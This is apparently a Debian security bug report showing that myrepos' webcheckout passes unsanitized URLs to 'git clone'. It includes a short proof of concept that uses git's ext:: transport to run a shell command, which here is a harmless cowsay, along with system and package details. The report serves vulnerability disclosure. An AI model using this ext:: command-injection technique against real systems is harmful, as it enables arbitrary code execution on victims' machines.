Package: myrepos
Version: 1.20160123
Tags: security

webcheckout passes the extracted URL to "git clone", without any sanitization. Malicious website operators or MitM attackers could exploit it for arbitrary code execution.

PoC:

 $ webcheckout /path/to/badgit.html
 git clone ext::sh -c cowsay% pwned% >% /dev/tty
 Cloning into 'tty'...
  _______
 < pwned >
  -------
         \   ^__^
          \  (oo)\_______
             (__)\       )\/\
                 ||----w |
                 ||     ||
 fatal: Could not read from remote repository.


-- System Information:
Debian Release: stretch/sid
 APT prefers unstable
 APT policy: (990, 'unstable'), (500, 'experimental')
Architecture: i386 (x86_64)
Foreign Architectures: amd64

Kernel: Linux 4.7.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)

myrepos depends on no packages.

Versions of packages myrepos recommends:
ii  libhtml-parser-perl  3.72-2+b1
ii  libio-pty-easy-perl  0.09-2
ii  libwww-perl          6.15-1
ii  perl                 5.24.1~rc3-3

Versions of packages myrepos suggests:
pn  ack-grep          <none>
ii  bzr               2.7.0+bzr6619-2
ii  curl              7.50.1-1
pn  cvs               <none>
pn  darcs             <none>
pn  fossil            <none>
ii  git [git-core]    1:2.9.3-1
pn  kdesdk-scripts    <none>
ii  liburi-perl       1.71-1
ii  mercurial         3.9.1-1
ii  subversion        1.9.4-3+b1
pn  subversion-tools  <none>
pn  vcsh              <none>

--
Jakub Wilk
% /dev/tty" />

Reply via email to